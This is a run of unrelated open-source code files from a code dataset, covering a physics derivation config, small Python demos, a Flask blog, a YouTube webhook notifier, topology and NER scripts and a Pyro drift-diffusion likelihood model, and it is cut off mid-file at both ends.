acc.addPublicTool(FTAG3UFOjetsSkimmingTool)\n # filter single-jet triggers for data\n if not flags.Input.isMC:\n acc.merge(FTAG3TriggerSkimmingToolCfg(flags, skimmingTools))\n\n # thinning tools\n thinningTools = []\n from DerivationFrameworkInDet.InDetToolsConfig import MuonTrackParticleThinningCfg\n # Include inner detector tracks associated with muons\n FTAG3MuonTPThinningTool = acc.getPrimaryAndMerge(MuonTrackParticleThinningCfg(\n flags,\n name = \"FTAG3MuonTPThinningTool\",\n StreamName = kwargs['StreamName'],\n MuonKey = \"Muons\",\n InDetTrackParticlesKey = \"InDetTrackParticles\"))\n\n skimmingTools += [\n FTAG3UFOjetsSkimmingTool,\n FTAG3LeptonSkimmingTool,\n ]\n\n thinningTools = [\n FTAG3MuonTPThinningTool,\n ]\n\n # Finally the kernel itself\n DerivationKernel = CompFactory.DerivationFramework.DerivationKernel\n acc.addEventAlgo(DerivationKernel(name, AugmentationTools = augmentationTools, ThinningTools = thinningTools, SkimmingTools = skimmingTools))\n return acc\n\n\ndef FTAG3Cfg(flags, skimmingTools=None):\n acc = ComponentAccumulator()\n \n # Get the lists of triggers needed for trigger matching.\n # This is needed at this scope (for the slimming) and further down in the config chain\n # for actually configuring the matching, so we create it here and pass it down\n # TODO: this should ideally be called higher up to avoid it being run multiple times in a train\n from DerivationFrameworkPhys.TriggerListsHelper import TriggerListsHelper\n FTAG3TriggerListsHelper = TriggerListsHelper(flags)\n\n # the name_tag has to consistent between KernelCfg and CoreCfg\n FTAG3_name_tag = 'FTAG3'\n\n # 
Common augmentations\n acc.merge(FTAG3KernelCfg(flags, name= FTAG3_name_tag + \"Kernel\", StreamName = 'StreamDAOD_'+FTAG3_name_tag, TriggerListsHelper = FTAG3TriggerListsHelper))\n\n from DerivationFrameworkFlavourTag.FTAG1 import FTAG1CoreCfg\n\n extra_SmartCollections = []\n extra_AllVariables = [ \"AntiKt10LCTopoTrimmedPtFrac5SmallR20Jets\" ]\n trigger_option = 'FTAG3'\n acc.merge(FTAG1CoreCfg(flags, FTAG3_name_tag, extra_SmartCollections, extra_AllVariables, trigger_option))\n\n return acc\n\n\ndef FTAG3TriggerSkimmingToolCfg(flags, skimmingTools=None):\n \"\"\"configure the trigger skimming tool\"\"\"\n acc = ComponentAccumulator()\n\n if skimmingTools is None:\n skimmingTools = []\n \n triggers = [\n 'HLT_j150', 'HLT_j200', 'HLT_j260', 'HLT_j300', 'HLT_j320', 'HLT_j360', 'HLT_j380', 'HLT_j400', 'HLT_j420'\n ]\n\n FTAG3TrigSkimmingTool = CompFactory.DerivationFramework.TriggerSkimmingTool( name = \"FTAG3TrigSkimmingTool1\",\n TriggerListOR = triggers )\n acc.addPublicTool(FTAG3TrigSkimmingTool)\n skimmingTools += [\n FTAG3TrigSkimmingTool\n ]\n return(acc)\n\n\n","repo_name":"Yusuf-Manjra/athena","sub_path":"PhysicsAnalysis/DerivationFramework/DerivationFrameworkFlavourTag/python/FTAG3.py","file_name":"FTAG3.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73019350914","text":"from pydantic import BaseModel\n\n\n# Java style library pydantic to marshal and unmarshal\n\nclass NewUser(BaseModel):\n name: str\n age: int\n happy: bool\n\n\nuser: NewUser = NewUser(name=\"pradeep\", age=23, happy=True)\nuserJson = user.model_dump_json(indent=4)\nprint(userJson)\n\nuserstr = '{\"name\":\"pradeep\",\"age\":23,\"happy\":true}'\nuserFstr = user.model_validate_json(userstr)\nprint(userFstr.name)\nprint(type(userFstr))\n\n","repo_name":"arrin69/advancepy","sub_path":"json/AnotherWay.py","file_name":"AnotherWay.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25652403803","text":"print(\"05 - ESTRELLAS\\n\")\n\"\"\"\nHaz que aparezca una cuadrícula de estrellas en la pantalla.\n\"\"\"\n\nimport sys\nimport pygame\n\nfrom star import Star\n\nclass Main:\n def __init__(self):\n pygame.init()\n pygame.display.set_caption(\"Estrellas\")\n \n self.screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\n self.screen_rect = self.screen.get_rect()\n\n self.stars = pygame.sprite.Group()\n self._create_starry_sky()\n\n\n def run_game(self):\n while True:\n self._check_events()\n\n self._update_screen()\n pygame.display.flip()\n\n\n def _check_events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT or (\n event.type == pygame.KEYDOWN and\n event.key == pygame.K_q\n ):\n sys.exit()\n\n\n def _create_starry_sky(self):\n star = Star(self)\n star_width, star_height = star.rect.size\n\n available_space_x = self.screen_rect.width - star_width\n number_stars_x = available_space_x // (2 * star_width)\n available_space_y = self.screen_rect.height - star_height\n number_stars_y = available_space_y // (2 * star_height)\n\n for row_number in range(number_stars_y):\n for star_number in range(number_stars_x):\n self._create_star(star_number, row_number)\n\n\n def _create_star(self, star_number, row_number):\n star = Star(self)\n star_width, star_height = star.rect.size\n \n star.x = star_width + 2 * star_width * star_number\n star.rect.x = star.x\n\n star.y = star_height + 2 * 
star_height * row_number\n star.rect.y = star.y\n\n self.stars.add(star)\n\n\n def _update_screen(self):\n self.screen.fill((0, 0, 0))\n\n self.stars.draw(self.screen)\n\n\nif __name__ == '__main__':\n ss = Main()\n ss.run_game()","repo_name":"nlarrea/apuntes-de-python","sub_path":"EJERCICIOS/12_creating_games/05_estrellas/05_estrellas.py","file_name":"05_estrellas.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16915356428","text":"# -*- coding: utf-8 -*-\n# Author: José María Jiménez Manzano\n\n## https://leimao.github.io/blog/Python-tqdm-Multiprocessing/\n## https://kirk86.github.io/2017/08/python-multiprocessing/\n\nfrom multiprocessing import Pool\n\nfrom tqdm import tqdm\n\n\ndef run_map_multiprocessing(func, argument_list, num_processes):\n pool = Pool(processes=num_processes)\n\n pool.map(func=func, iterable=argument_list)\n pool.close()\n pool.join()\n\n return\n\n\ndef run_imap_multiprocessing(func, argument_list, num_processes):\n pool = Pool(processes=num_processes)\n\n result_list_tqdm = []\n for result in tqdm(pool.imap(func=func, iterable=argument_list), total=len(argument_list)):\n result_list_tqdm.append(result)\n\n return result_list_tqdm\n\n\ndef run_imap_unordered_multiprocessing(func, argument_list, num_processes):\n pool = Pool(processes=num_processes)\n\n result_list_tqdm = []\n for result in tqdm(pool.imap_unordered(func=func, iterable=argument_list), total=len(argument_list)):\n result_list_tqdm.append(result)\n\n return result_list_tqdm\n\n\ndef run_apply_async_multiprocessing(func, argument_list, num_processes):\n pool = Pool(processes=num_processes)\n\n jobs = [\n pool.apply_async(func=func, args=(*argument,))\n if isinstance(argument, tuple)\n else pool.apply_async(func=func, args=(argument,))\n for argument in argument_list\n ]\n pool.close()\n result_list_tqdm = []\n for job in tqdm(jobs):\n result_list_tqdm.append(job.get())\n\n return result_list_tqdm\n","repo_name":"josemjm/pvgis_analytics","sub_path":"scripts/utils/multiprocessing_functions.py","file_name":"multiprocessing_functions.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24757056195","text":"\"\"\" Series Helper mode for InluxDB\n\"\"\"\nfrom typing import Any, Text, List, Dict, Optional, Iterator, Union\nfrom datetime import datetime\n\n\nclass SeriesHelper():\n \"\"\" SeriesHelper class\n \"\"\"\n def __init__(self, series: Text, tags: Optional[List] = None) -> None:\n \"\"\" Create Helper\n \"\"\"\n self.points: List[Dict[Text, Any]] = []\n self.series: Text = series\n self.tags: List = tags or []\n\n def __iter__(self) -> Iterator:\n return iter(self.points)\n\n def add_point(self, _data_: Dict) -> None:\n \"\"\" Add single series point\n \"\"\"\n current_time = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')\n\n point_fields = {\n k: to_num(v)\n for k, v in _data_.items() if k not in self.tags\n }\n\n point_tags = {\n k: to_str(v)\n for k, v in _data_.items() if k in self.tags\n }\n\n point = {\n 'measurement': self.series,\n 'fields': point_fields,\n 'tags': point_tags,\n 'time': current_time\n }\n\n self.points.append(point)\n\n def add_points(self, _data_: List[Dict]) -> None:\n \"\"\" Add multiply series points\n \"\"\"\n for item in _data_:\n self.add_point(item)\n\n\ndef to_str(value: Union[None, str, float, int, bytes]) -> Union[str]:\n \"\"\" Return string value\n 
\"\"\"\n    if isinstance(value, bytes):\n        return value.decode() if value.isascii() else value.hex()\n\n    return str(value)\n\n\ndef to_num(value: Union[None, str, float, int, bytes]) -> Union[float, int]:\n    \"\"\" Return float or integer value\n    \"\"\"\n    if isinstance(value, (float, int)):\n        return value\n\n    return float(value) if '.' in to_str(value) else int(value)\n","repo_name":"hramcovdv/watcher","sub_path":"serieshelper.py","file_name":"serieshelper.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2992927807","text":"solutions = [\n    {\n        \"url\": \"https://chromium.googlesource.com/chromium/src.git\",\n        \"managed\": False,\n        \"name\": \"src\",\n        \"deps_file\": \".DEPS.git\",\n        \"custom_deps\": {},\n        \"custom_vars\": {\n            \"checkout_nacl\": True,\n            \"cros_boards\": \"amd64-generic\",\n            \"checkout_lacros_sdk\": True,\n        },\n    },\n]\ntarget_os=[\"chromeos\"]\n","repo_name":"nickdiego/chromium-env","sub_path":".gclient","file_name":".gclient","file_ext":"gclient","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"27503298650","text":"from flask import (\n    Blueprint, flash, g, redirect, render_template, request, url_for\n)\nfrom werkzeug.exceptions import abort\n\nfrom flaskr.auth import login_required\nfrom flaskr.db import get_db\n\nbp = Blueprint('blog', __name__)\n\n'''\n1. index()\n- Shows every post.\n- JOINs the user table so the author information is displayed.\n'''\n@bp.route('/')\ndef index():\n    db = get_db()\n    posts = db.execute(\n        'SELECT p.id, title, body, created, author_id, username'\n        ' FROM post p JOIN user u ON p.author_id = u.id'\n        ' ORDER BY created DESC'\n    ).fetchall()\n    return render_template('blog/index.html', posts=posts)\n\n'''\n2. login_required\n- Uses the decorator created in auth so the view is accessible only when logged in.\n'''\n@bp.route('/create', methods=('GET', 'POST'))\n@login_required\ndef create():\n    if request.method == 'POST':\n        title = request.form['title']\n        body = request.form['body']\n        error = None\n\n        if not title:\n            error = 'Title is required.'\n\n        if error is not None:\n            flash(error)\n        else:\n            db = get_db()\n            db.execute(\n                'INSERT INTO post (title, body, author_id)'\n                ' VALUES (?, ?, ?)',\n                (title, body, g.user['id'])\n            )\n            db.commit()\n            return redirect(url_for('blog.index'))\n\n    return render_template('blog/create.html')\n\ndef get_post(id, check_author=True):\n    post = get_db().execute(\n        'SELECT p.id, title, body, created, author_id, username'\n        ' FROM post p JOIN user u ON p.author_id = u.id'\n        ' WHERE p.id = ?',\n        (id,)\n    ).fetchone()\n\n    '''\n    3. abort()\n    - Raises a special exception that returns an HTTP status code.\n    '''\n    if post is None:\n        abort(404, \"Post id {0} doesn't exist.\".format(id))\n\n    '''\n    4. check_author\n    - This flag decides whether the author validation check runs.\n    '''\n    if check_author and post['author_id'] != g.user['id']:\n        abort(403)\n\n    return post\n\n'''\n5. <int:id>\n- The parameter id receives the post id from the URL.\n- Without int: it defaults to string.\n- url_for('blog.update', id=post['id'])\n'''\n@bp.route('/<int:id>/update', methods=('GET', 'POST'))\n@login_required\ndef update(id):\n    post = get_post(id)\n\n    if request.method == 'POST':\n        title = request.form['title']\n        body = request.form['body']\n        error = None\n\n        if not title:\n            error = 'Title is required.'\n\n        if error is not None:\n            flash(error)\n        else:\n            db = get_db()\n            db.execute(\n                'UPDATE post SET title = ?, body = ?'\n                ' WHERE id = ?',\n                (title, body, id)\n            )\n            db.commit()\n            return redirect(url_for('blog.index'))\n\n    return render_template('blog/update.html', post=post)\n\n'''\n6. delete\n- Supports POST only and redirects to index.\n'''\n@bp.route('/<int:id>/delete', methods=('POST',))\n@login_required\ndef delete(id):\n    get_post(id)\n    db = get_db()\n    db.execute('DELETE FROM post WHERE id = ?', (id,))\n    db.commit()\n    return redirect(url_for('blog.index'))","repo_name":"rmk1075/Flask_Tutorial","sub_path":"Tutorial/flaskr/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40639413372","text":"import torch\nfrom hvit.decision_block.filter_block import ImagePatchFilter\nimport torchvision\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\nfrom utils.image_utils import load_jpg_image, load_png_image\n\ndef main(mode='cifar10', probabilistic=True, heuristic='contrast'):\n    # Define the transformations to apply to the images\n    transform = transforms.Compose([\n        # Resize the image to (64, 64)\n        transforms.Resize((64, 64)),\n        # Convert the image to a PyTorch tensor\n        transforms.ToTensor(),\n        # Normalize the image with mean and standard deviation of 0.5\n        transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n    ])\n\n    # Create an instance of the ImagePatchFilter class\n    filter = ImagePatchFilter(patch_size=16, top_k=128, heuristic=heuristic, probabilistic=probabilistic, prob=1, verbose=True)\n\n    if mode == 'cifar10':\n        # Load the CIFAR10 dataset\n        dataset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform)\n\n        # Choose 5 random indices from the dataset\n        rand_indices = torch.randint(0, len(dataset), (5,))\n\n        # Get the corresponding images and labels\n        img = []\n        labels = []\n        for i in range(5):\n            img_i, label_i = dataset[rand_indices[i]]\n            img.append(img_i)\n            labels.append(label_i)\n        img = torch.stack(img, dim=0)\n\n    if mode == 'static':\n        # Alternatively, use a static test image\n        img = torch.from_numpy(load_jpg_image('data/images/dog2.jpg')).permute(2,0,1)\n        img = torch.unsqueeze(img, dim=0).repeat(1, 1, 1, 1)\n\n\n    # Apply the ImagePatchFilter to the images\n    filtered_image = filter(img)\n\n    # Display the original and filtered images for each of the 5 randomly chosen images\n    for i in range(filtered_image.shape[0]):\n        # Define the figure and axis objects\n        fig, axs = plt.subplots(1, 2, figsize=(15, 5))\n\n        # Plot the original image on the first axis\n        axs[0].imshow(torchvision.utils.make_grid(img[i], nrow=1).permute(1, 2, 0))\n        axs[0].set_title(\"Original Image\")\n\n        # Plot the filtered image on the second axis\n        axs[1].imshow(torchvision.utils.make_grid(filtered_image[i], nrow=1).permute(1, 2, 0))\n        axs[1].set_title(\"Filtered Image\")\n\n        # Display the plot\n        plt.show()\n\nif __name__ == '__main__':\n    main(mode='static', probabilistic=False, 
heuristic='contrast')","repo_name":"MattiaLimone/HuggingGreen","sub_path":"src/hvit/decision_block/filter_block_test_script.py","file_name":"filter_block_test_script.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"640716551","text":"import dionysus as d\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport sys\nimport pandas\n\n# number of homologies to computer\nhomology_dim = 3\n# max epsilon of vr complex to comopute\nmax_r = 1\n\n# plots barcodes given barcode data\ndef plot_bars(dgm, order='birth', show=False, ax=None, **bar_style):\n bar_kwargs = {'color': 'b'}\n bar_kwargs.update(bar_style)\n\n if order == 'death':\n generator = enumerate(sorted(dgm, key = lambda p: p.death))\n else:\n generator = enumerate(dgm)\n\n if ax is None:\n ax = plt.axes()\n\n for i,p in generator:\n if p.death == math.inf:\n ax.plot([p.birth, max_r], [i,i], **bar_kwargs)\n else:\n ax.plot([p.birth, p.death], [i,i], **bar_kwargs)\n ax.set_xlim([0, max_r])\n if show:\n plt.show()\n\n# generates and displays barcodes from given pointcloud\n# verbose: prints each barcode if true\n# title: sets title of the graph\ndef generate_barcode(pointcloud, verbose=False, title=''):\n # generate vr sequence\n f = d.fill_rips(pointcloud, homology_dim, max_r)\n\n # compute homologies for every vr complex in filter\n m = d.omnifield_homology_persistence(f)\n\n # generate barcode data from computed homologies and vr sequence\n dgms = d.init_diagrams(m, f, 2)\n if verbose:\n for i, dgm in enumerate(dgms):\n for pt in dgm:\n print(i, pt.birth, pt.death)\n\n # plot data\n fig, axes = plt.subplots(homology_dim)\n fig.suptitle(title)\n for i in range(homology_dim): # generate a plot for each homology group\n plot_bars(dgms[i], show = False, ax=axes[i])\n axes[i].axes.get_yaxis().set_visible(False)\n axes[i].set_title(\"Homology Group \" + str(i))\n plt.tight_layout()\n plt.show()\n return dgms\n\nif __name__ == '__main__':\n i = 1\n while i < len(sys.argv):\n # load pointcloud\n filename = sys.argv[i]\n points = np.loadtxt(filename)\n\n # set epsilion\n max_r = 1\n if(len(sys.argv) > i+1):\n max_r = float(sys.argv[i+1])\n i += 1\n generate_barcode(points, title=\"Persistant Homologies of \" + filename)\n i += 1\n\n # Code used for processing political data -- ignore for homology computation\n # data = pandas.read_csv('luc_R_no_stopwords.csv')\n # points = data.values\n # np.savetxt('luc_R_no_stopwords', points)\n # plt.scatter(points[:,0], points[:,1])\n # plt.show()\n # rep = plot_barcode(points, title=\"Persistant Homologies\")\n\n # data = pandas.read_csv('luc_D_no_stopwords.csv')\n # points = data.values\n # np.savetxt('luc_D_no_stopwords', points)\n # plt.scatter(points[:,0], points[:,1])\n # plt.show()\n # dem = plot_barcode(points, title=\"Persistant Homologies\")\n\n # data = pandas.read_csv('luc_no_stopwords_labelled.csv')\n # points = data.values\n # for point in points:\n # point[2] = float(point[2])\n # np.savetxt('luc_no_stopwords_labelled', points)\n # plt.scatter(points[:,0], points[:,1])\n # plt.show()\n # dem = plot_barcode(points, title=\"Persistant Homologies\")\n\n # print(d.bottleneck_distance(rep[0], dem[0]))\n # print(d.bottleneck_distance(rep[1], 
dem[1]))\n","repo_name":"LucCote/persistent_homology","sub_path":"vr_persistant_homology.py","file_name":"vr_persistant_homology.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16454691237","text":"class Solution:\n    def removeDuplicates(self, nums):\n        i = 0\n        while len(nums) != len(set(nums)):\n            p_el = nums[i]\n            for j in range(nums.count(p_el) - 1):\n                nums.remove(p_el)\n            i += 1\n\n        return len(nums)\n","repo_name":"rohit18115/Leetcode","sub_path":"Easy questions/26/another_unoptimized.py","file_name":"another_unoptimized.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73458378433","text":"from flask_app import app\nfrom flask import render_template, redirect, request, session, flash\nfrom flask_app.models import user, book, favorite\n\n@app.route('/home')\ndef home():\n\n    if 'user_id' not in session:\n        return redirect('/')\n    \n    user_data = {'id':session['user_id']}\n    current_user = user.User.get_one(user_data)\n\n    # all_favs = favorite.Favorite.get_all_favs_from_user(user_data)\n    \n    \n    all_books = book.Book.get_all_with_user()\n\n\n    return render_template('home.html', current_user=current_user, all_books=all_books)\n\n","repo_name":"AlejoFernii/Book_Club","sub_path":"flask_app/controllers/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72363481155","text":"import sys\nfrom runner import run\n\ndef main():\n    if len(sys.argv) != 2:\n        print(\"Usage: {} <data>\".format(sys.argv[0]))\n        sys.exit(1)\n\n    data = sys.argv[1]\n    run(bytes.fromhex(data), True)\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"efecarranza/evm-py","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3929158099","text":"# to get playlist id for a channel:\n# GET https://www.googleapis.com/youtube/v3/channels?id={config['channel_id']}&part=contentDetails&key={config['api_key']}\n# playlist id is at [\"items\"][0][\"contentDetails\"][\"relatedPlaylists\"][\"uploads\"]\n\nimport requests\nimport yaml\nimport json\n\nwith open(\"config.yml\") as f:\n    config = yaml.safe_load(f)\n\nYT_PARAMS = {\n    \"key\": config[\"key\"],\n    \"maxResults\": 50,\n    \"part\": \"snippet\",\n    \"playlistId\": config[\"playlist\"]\n}\n\ndef get_new(new_data) -> list:\n    with open(\"data.json\", \"r\") as f:\n        old_data = json.load(f)\n\n    return [i for i in new_data[\"items\"][:5] if i not in old_data]\n\ndef get_videos():\n    req = requests.get(\"https://www.googleapis.com/youtube/v3/playlistItems\", params=YT_PARAMS)\n    return req.json()\n\ndef post_webhook(title, url):\n    data = {\n        \"content\": f\"@everyone\\nNew YouTube video out: {title} -> {url}\",\n        \"username\": \"YouTube Notifications\",\n        \"avatar_url\": \"https://www.logo.wine/a/logo/YouTube/YouTube-Icon-Full-Color-Logo.wine.svg\"\n    }\n\n    requests.post(config[\"webhook\"], json=data)\n\n    print(f\"Posted Webhook: {title} - {url}\")\n\ndef save_data(data):\n    with open(\"data.json\", \"w\") as f:\n        json.dump(data[\"items\"], f, indent=4)\n\ndef main():\n    data = get_videos()\n    new = get_new(data)\n    for video in new:\n        post_webhook(video[\"snippet\"][\"title\"], \"https://www.youtube.com/watch?v=\" + video[\"id\"])\n 
save_data(data)\n\nif __name__ == \"__main__\":\n main()","repo_name":"meizuflux/youtube-webhook","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71766808515","text":"# coding=utf-8\n\"\"\"Tests for the abstract class and sensor classes.\"\"\"\nimport pytest\nfrom testfixtures import LogCapture\n\nfrom mycodo.inputs.base_input import AbstractInput\n\n\n# ----------------------------\n# AbstractInput\n# ----------------------------\ndef test_abstract_input_get_measurement_method_logs_when_not_implemented():\n \"\"\" Verify that methods that are not overwritten log as errors.\"\"\"\n with LogCapture() as log_cap:\n with pytest.raises(NotImplementedError):\n AbstractInput(None, testing=True).get_measurement()\n expected_error = ('mycodo.inputs.base_input',\n 'ERROR',\n ('AbstractInput did not overwrite the get_measurement() '\n 'method. All subclasses of the AbstractInput '\n 'class are required to overwrite this method'))\n assert expected_error in log_cap.actual()\n","repo_name":"kizniche/Mycodo","sub_path":"mycodo/tests/software_tests/test_inputs/test_abstract_input_class.py","file_name":"test_abstract_input_class.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":2708,"dataset":"github-code","pt":"61"} +{"seq_id":"38572148251","text":"\"\"\"Reload and serve a saved model\"\"\"\n\nfrom pathlib import Path\nfrom tensorflow.contrib import predictor\nfrom functools import partial\nimport numpy as np\n\nLINE = '''中央纪委国家监委网站4月29日消息,日前,经中共中央批准,中央纪委国家监委对陕西省委原常委、秘书长钱引安严重违纪违法问题进行了立案审查调查。'''\n\n\ndef extract_entities(tags_array, text_line):\n text_line = text_line.strip()\n results = {'PER': [], 'LOC': [], 'ORG': []}\n begin = len(text_line)\n meet_b = False\n entity = 'O'\n for idx, tag in enumerate(np.squeeze(tags_array)):\n tag = tag.decode()\n if tag[0] == 'B' and not meet_b:\n meet_b = True\n begin = idx\n entity = tag[2:]\n elif tag[0] == 'B' and meet_b:\n results[entity].append(text_line[begin:idx])\n meet_b = False\n elif tag[0] == 'O' and meet_b:\n results[entity].append(text_line[begin:idx])\n meet_b = False\n if meet_b:\n results[entity].append(text_line[begin:])\n return results\n\n\ndef predict(pred_fn, line):\n words = [w.encode() for w in line.strip()]\n nwords = len(words)\n predictions = pred_fn({'words': [words], 'nwords': [nwords]})\n return predictions\n\n\nif __name__ == '__main__':\n export_dir = 'saved_model'\n subdirs = [x for x in Path(export_dir).iterdir()\n if x.is_dir() and 'temp' not in str(x)]\n latest = str(sorted(subdirs)[-1])\n predict_fn = partial(predict, predictor.from_saved_model(latest))\n print(LINE)\n print(extract_entities(predict_fn(LINE)['tags'], LINE))\n line = input('\\n\\n输入一句中文: ')\n while line.strip().lower() != 'q':\n print('\\n\\n', extract_entities(predict_fn(line)['tags'], line))\n line = input('\\n\\n输入一句中文: ')\n","repo_name":"linguishi/chinese_NER","sub_path":"bilstm_crf/serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"41218799024","text":"import torch\nimport pyro\nimport pyro.distributions as dist\nimport argparse\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom torch.distributions.constraints import positive\n\nimport logging\nimport os\n\n#import torch\nimport numpy as np\nimport pandas as pd\nimport 
seaborn as sns\nimport matplotlib.pyplot as plt\nimport pickle\nimport scipy\nimport arviz as az # used below for az.from_pyro(mcmc)\nimport uuid # used below for uuid.uuid1() when saving results\n\nimport pyro\nimport ssms\nimport lanfactory\n#torch.set_default_dtype(torch.float64)\ntorch.set_default_dtype(torch.float32)\n\nfrom lanfactory.trainers.torch_mlp import TorchMLP \n\nimport lanfactory\nimport ssms\nfrom copy import deepcopy\n\nsmoke_test = ('CI' in os.environ)\nassert pyro.__version__.startswith('1.8.1')\n\npyro.enable_validation(True)\npyro.set_rng_seed(9)\nlogging.basicConfig(format='%(message)s', level=logging.INFO)\n\nimport math\nfrom numbers import Real\nfrom numbers import Number\n\nimport torch\nfrom torch.distributions import constraints\nfrom torch.distributions.exp_family import ExponentialFamily\nfrom torch.distributions.utils import _standard_normal, broadcast_all\n\nfrom time import time\n\ndef sim_wrap(theta = torch.zeros(0), model = 'ddm'):\n theta = theta.numpy().astype(np.float32)\n out = ssms.basic_simulators.simulator(theta = theta,\n model = model,\n n_samples = 1,\n delta_t = 0.001,\n max_t = 20.0,\n no_noise = False,\n bin_dim = None,\n bin_pointwise = False)\n \n return torch.tensor(np.hstack([out['rts'].astype(np.float32), out['choices'].astype(np.float32)]))\n\nclass LoadTorchMLP:\n def __init__(self, \n model_file_path = None,\n network_config = None,\n input_dim = None):\n \n ##torch.backends.cudnn.benchmark = True\n self.dev = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n self.model_file_path = model_file_path\n self.network_config = network_config\n self.input_dim = input_dim\n \n self.net = lanfactory.trainers.torch_mlp.TorchMLP(network_config = self.network_config,\n input_shape = self.input_dim,\n generative_model_id = None)\n self.net.load_state_dict(torch.load(self.model_file_path))\n self.net.to(self.dev)\n\n # AF-TODO: Seemingly LoadTorchMLPInfer is still not callable !\n @torch.no_grad()\n def __call__(self, x):\n return self.net(x)\n\n @torch.no_grad()\n def predict_on_batch(self, x = None):\n return self.net(torch.from_numpy(x).to(self.dev)).cpu().numpy()\n \n \nclass CustomTorchMLP:\n def __init__(self, state_dict, network_config):\n self.weights = []\n self.biases = []\n self.activations = deepcopy(network_config['activations'])\n self.net_depth = len(self.activations)\n self.state_dict = state_dict\n cnt = 0\n for obj in self.state_dict:\n if 'weight' in obj:\n self.weights.append(deepcopy(self.state_dict[obj]).T)\n elif 'bias' in obj:\n self.biases.append(torch.unsqueeze(deepcopy(self.state_dict[obj]), 0))\n \n def forward(self, input_tensor):\n tmp = input_tensor\n for i in range(0, self.net_depth - 1, 1):\n tmp = torch.tanh(torch.add(torch.matmul(tmp, self.weights[i]), self.biases[i]))\n tmp = torch.add(torch.matmul(tmp, self.weights[self.net_depth - 1]), self.biases[self.net_depth - 1])\n return tmp\n \n\nclass CustomTorchMLPMod(torch.nn.Module):\n def __init__(self, state_dict, network_config):\n super(CustomTorchMLPMod, self).__init__()\n self.weights = []\n self.biases = []\n self.activations = deepcopy(network_config['activations'])\n self.net_depth = len(self.activations)\n self.state_dict = state_dict\n cnt = 0\n for obj in self.state_dict:\n if 'weight' in obj:\n self.weights.append(deepcopy(self.state_dict[obj]).T)\n elif 'bias' in obj:\n self.biases.append(torch.unsqueeze(deepcopy(self.state_dict[obj]), 0))\n #super().__init\n \n def forward(self, input_tensor):\n tmp = input_tensor\n for i in range(0, self.net_depth - 1, 1):\n tmp = torch.tanh(torch.add(torch.matmul(tmp, self.weights[i]), 
self.biases[i]))\n tmp = torch.add(torch.matmul(tmp, self.weights[self.net_depth - 1]), self.biases[self.net_depth - 1])\n return tmp\n \nclass MyDDMh(dist.TorchDistribution):\n# arg_constraints = {'loc': constraints.interval(-1, 1),\n# 'scale': constraints.interval(0.0001, 10)\n# }\n def __init__(self, v, a, z, t):\n self.net = network\n self.n_samples = n_samples_by_subject\n self.boundaries = model_config['param_bounds']\n self.out_of_bounds_val = -66.1\n self.v = v\n self.a = a\n self.z = z\n self.t = t\n \n if isinstance(v, Number): # and isinstance(a, Number):\n batch_shape = torch.Size()\n else:\n batch_shape = self.v.size()\n \n super().__init__(batch_shape = batch_shape, event_shape = torch.Size((2,))) #torch.Size((2,))) # event_shape = (1,))\n \n def sample(self):\n theta = torch.vstack([self.v, self.a, self.z, self.t]).T\n return sim_wrap(theta = theta, model = 'ddm')\n \n def log_prob(self, value):\n \n if self.v.dim() == 3:\n dat_tmp = value.repeat((self.v.size()[0], 1, 1, 1))\n\n tmp_params = torch.stack([self.v, self.a, self.z, self.t], \n dim = -1).tile((1, self.n_samples, 1, 1))\n \n net_in = torch.cat([tmp_params, dat_tmp], dim = -1)\n logp = torch.clip(self.net(net_in), min = -16.11)\n logp_squeezed = torch.squeeze(logp, dim = -1)\n \n # v constraint\n logp_squeezed = torch.where(net_in[:, :, :, 0] < torch.tensor(3.),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, :, 0] > torch.tensor(-3.),\n logp_squeezed, \n 